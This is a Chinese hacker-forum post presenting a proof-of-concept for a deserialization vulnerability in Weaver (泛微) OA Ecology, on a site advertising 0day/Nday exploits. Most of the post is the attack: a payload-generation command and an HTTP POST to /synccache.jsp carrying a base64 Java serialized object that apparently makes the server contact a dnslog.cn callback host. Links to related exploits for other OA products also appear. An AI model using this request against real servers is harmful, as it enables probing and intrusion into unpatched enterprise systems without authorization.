黑客仓库

最全面知识的黑客论坛,全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库,您可以在我们的论坛板块进行交流和学习。

立即注册账号!
Shacker

泛微OA Ecology-泛微OA反序列化漏洞

Shacker

Shacker已验证会员

黑客倉庫站長

贡献: 21%
注册
09 10, 2024
消息
186
Python:
代码: 
## 漏洞概述

暂无详情

## 影响范围

```http
未知
```

## 漏洞复现

生成反序列化 payload

```bash
java -jar xx | base64
```

```http
POST /synccache.jsp HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

data=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVz
aG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFz
aENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgAD
TAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEHg4Yzgy
dy5kbnNsb2cuY250AABxAH4ABXQABGh0dHBweHQAF2h0dHA6Ly94OGM4MncuZG5zbG9nLmNueA==
```
 
Shacker
POC  泛微OA `weaver.common.Ctrl` 存在任意文件上传漏洞
Shacker
兰陵OA  EKP 后台SQL注入漏洞 CNVD-2021-01363
点击展开...
好评 0 否决票
您必须登录或注册才可回复。

论坛统计

主题
206
消息
207
会员
3
最新会员
H4CK3R

新会员

在线会员

现在没有会员在线。
当前在线: 0 (会员: 0, 游客: 0)

关于我们

黑客仓库是一个专门为网络安全技术爱好者开设的网站论坛,发表话题请注意词汇引用,禁止发布恐怖、政治敏感话题,谢谢您的配合。

关于我们   帮助   用户协议   隐私政策

业务合作   加入团队   交流群TG   地图
后退
顶部